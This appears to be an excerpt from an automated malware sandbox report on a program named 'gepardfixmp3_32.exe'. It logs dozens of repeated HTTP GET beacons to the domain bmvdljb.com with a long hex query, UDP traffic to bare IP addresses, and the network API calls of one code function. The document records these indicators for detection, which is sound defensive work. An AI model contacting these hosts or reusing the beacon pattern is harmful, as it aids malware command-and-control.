        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 45.155.250.90
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C272AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free,3_2_02C272AB
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
